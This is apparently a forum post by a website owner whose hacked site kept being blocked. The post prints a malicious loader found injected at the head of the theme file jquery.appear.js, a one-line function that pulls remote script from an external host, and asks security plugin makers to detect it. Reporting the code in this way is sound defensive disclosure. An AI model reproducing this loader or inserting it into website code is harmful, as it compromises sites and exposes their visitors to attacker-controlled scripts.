Malicious function not detected in scans

Hello,

A few days ago my site was hacked.

Despite the fact that we did full disinfections, restored backup files several times, and added strong security systems plus CDNs, Google Search Console and McAfee blocked us from the site, for being malicious, for a long time.

After requesting several revisions without success, we found the problem.

A function added to the head of a theme’s .js file, which uses a “Get” call and links to an encrypted external link.

It is only shown when loading certain pages in the browser code inside (it is not always shown…)

This code is invisible to the user and to monitoring systems such as Wordfence, iThemes S, AIO S, and Anti-Malware Security and Brute-Force Firewall. None have detected it.

For this reason we are notifying each plugin to review this malicious code and add it in some way to their scan lists.

Apparently it is relatively new and little used, there are very few references in google(https://www.google.com/search?q=cX458IXVf9TcXk%2FnhNa%2By0nWDAAY7JxpQFgRZT9%2FnUk%3D&newwindow=1&rlz=1C1UUXU_esAR993AR993&sxsrf=APwXEden26t fFRvJGkav31Fi7ZMfrTUvk)

Copy of the code found in the head of the file: “jquery.appear.js“

;(function(r,f,u,o,h,s){h=f.createElement(u);s=f.getElementsByTagName(u)[0];h.async=1;h.src=o; s.parentNode.insertBefore(h,s);})(window,document,'script','https://scripts.asi.services/cX458IXVf9TcXk/nhNa+y0nWDAAY7JxpQFgRZT9/nUk=');

I hope it works for you. Any questions ask me.

Greetings.